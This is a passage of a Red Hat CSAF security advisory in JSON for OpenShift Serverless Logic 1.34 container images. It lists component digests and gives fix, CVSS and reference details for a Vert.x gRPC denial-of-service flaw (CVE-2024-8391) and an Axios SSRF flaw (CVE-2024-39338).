},
"product_reference": "openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64"
},
"product_reference": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64"
},
"product_reference": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le"
},
"product_reference": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64"
},
"product_reference": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le"
},
"product_reference": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
},
"product_reference": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-8391",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2024-09-04T16:20:44.762419+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2309758"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the gRPC server in Eclipse Vert.x, which does not limit the maximum length of the message payload. This may lead to excessive memory consumption in a server or a client, causing a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "io.vertx:vertx-grpc-client: io.vertx:vertx-grpc-server: Vertx gRPC server does not limit the maximum message size",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-8391"
},
{
"category": "external",
"summary": "RHBZ#2309758",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2309758"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-8391",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8391"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-8391",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-8391"
},
{
"category": "external",
"summary": "https://github.com/eclipse-vertx/vertx-grpc/issues/113",
"url": "https://github.com/eclipse-vertx/vertx-grpc/issues/113"
},
{
"category": "external",
"summary": "https://gitlab.eclipse.org/security/cve-assignement/-/issues/31",
"url": "https://gitlab.eclipse.org/security/cve-assignement/-/issues/31"
}
],
"release_date": "2024-09-04T16:15:09.253000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-14T00:59:58+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8023"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "io.vertx:vertx-grpc-client: io.vertx:vertx-grpc-server: Vertx gRPC server does not limit the maximum message size"
},
{
"cve": "CVE-2024-39338",
"cwe": {
"id": "CWE-918",
"name": "Server-Side Request Forgery (SSRF)"
},
"discovery_date": "2024-08-13T17:21:32.774718+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2304369"
}
],
"notes": [
{
"category": "description",
"text": "A vulnerability was found in the Axios HTTP Client. It is vulnerable to a server-side request forgery attack (SSRF) caused by unexpected behavior where requests for path-relative URLs get processed as protocol-relative URLs. This flaw allows an attacker to perform arbitrary requests from the server, potentially accessing internal systems or exfiltrating sensitive data.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: axios: Server-Side Request Forgery",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is rated as IMPORTANT because it can be exploited remotely with low complexity and without user interaction, it poses a significant risk to confidentiality.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
